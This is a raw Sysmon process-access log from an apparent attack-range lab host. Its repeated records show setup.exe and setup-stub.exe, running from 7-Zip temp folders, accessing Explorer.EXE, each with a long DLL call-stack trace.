13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 